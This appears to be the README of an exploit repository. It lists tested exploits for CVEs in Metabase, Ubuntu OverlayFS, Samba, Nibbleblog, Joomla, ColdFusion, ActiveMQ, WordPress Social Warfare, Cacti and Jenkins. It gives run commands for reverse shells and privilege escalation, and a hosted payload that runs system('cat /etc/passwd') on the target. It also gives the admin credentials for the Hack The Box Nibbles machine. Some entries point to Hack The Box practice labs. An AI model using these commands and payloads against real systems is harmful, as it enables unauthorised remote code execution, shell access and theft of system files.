
Exploits working {tested by me} for various scenarios


Anekant-Singhai/Exploits


Exploit Collection

This is my curated collection of working exploits for various vulnerabilities. I will keep updating this repository with new and effective exploits.

CVE-2023-38646 (Metabase)

  • CVE ID: CVE-2023-38646
  • Description: This vulnerability allowed attackers to execute arbitrary commands on the Metabase server without any authentication.
  • Resolved in Metabase versions: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, 1.43.7.2.
  • Usage:
 python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.14.147 --lport 443

CVE-2021-3493 (Ubuntu Overlay fs)

Description: A precompiled exploit binary is included in case GCC is not available on the target. To compile from source:

gcc exploit.c -o exploit

CVE-2023-0386 (Ubuntu Overlay fs)

Description: This exploit is based on this source.

Installation:

make all

How to use:

Start two terminals. In the first terminal, type:

./fuse ./ovlcap/lower ./gc

In the second terminal, type:

./exp

CVE-2007-2447 (SMB version 3.0.20)

Description: An HTB (Hack The Box) exploit for SMB version 3.0.20 (the usermap_script vulnerability). Usage:

python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>

Requirements:

pip3 install pysmb

CVE-2015-6967 (Nibbleblog 4.0.3)

Description: An exploit for Nibbleblog 4.0.3; valid admin credentials must already be known. Usage:

exploit.py [-h] --url URL --username USERNAME --password PASSWORD --payload PAYLOAD

If you came here from HTB Nibbles: the credentials are admin / nibbles. You just have to guess them; there is no hint on the box and no brute-forcing is needed.


CVE-2023-23752 (Joomla Authentication Bypass / Information Leak)

Usage:

usage: CVE-2023-23752.py [-h] -u URL [-o OUTPUT_FILE]

Joomla CVE-2023-23752 exploit

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL with a trailing slash
  -o OUTPUT_FILE, --output-file OUTPUT_FILE
                        File to write the output to

CVE-2009-2265 {Apache ColdFusion 8.0.1 - Arbitrary File Upload / RCE}

I do not own this exploit; I keep it here for convenience. It belongs to Pergyz: https://www.exploit-db.com/exploits/50057

How to run: just run the script. It will prompt for your IP and port and for the target's.

Where to practice: HTB Arctic {Easy, Windows}


CVE-2023-46604 {Apache ActiveMQ RCE}

This exploit was inspired by X1r0z's exploit: https://github.com/X1r0z/ActiveMQ-RCE

This blog post will also help you understand the exploit: https://www.prio-n.com/blog/cve-2023-46604-attacking-defending-ActiveMQ

I wrote a short write-up that explains the underlying process: https://anekant-singhais-organization.gitbook.io/why-so-script-kiddie/cve-explained-cve-2023-46604

Usage:

CVE-2023-46604.py -ip <ip> -p <port, default 61616> -u <url of XML> -t {optional, for encrypted}

The XML file is also included. Edit it to set the commands you want to run on the target host.


CVE-2019-9978 {RCE in Social Warfare Plugin}

The Python 3 version is written by me. The original exploit belongs to researcher Luka Sikic (author: hash3liZer).

Usage: start a server hosting the payload file, which contains the code to run inside "pre" tags, like:

<pre>system('cat /etc/passwd')</pre>

Then run:

python3 exp.py -t <target-url> --payload-uri <exploit-file uri>

CVE-2022-46169 {Exploit for the RCE vulnerability in Cacti}

Usage:

python3 exploit.py -t <server-url> -lh <listener host> -lp <listener port>

Where to practice: HTB: MonitorsTwo

How to set up a lab server: Vicarius explains how to configure it: https://www.vicarius.io/blog/unauthenticated-rce-in-cacti-cve-2022-46169


CVE-2024-23897 {Jenkins arbitrary file read}

Usage:

python3 jenkins_exploit.py -u <url-for-jenkins> -f <file-to-read>

Where to practice: HTB: Builder

Feel free to add, update, or modify the exploits in this collection. Keep hacking! 🐱‍💻💥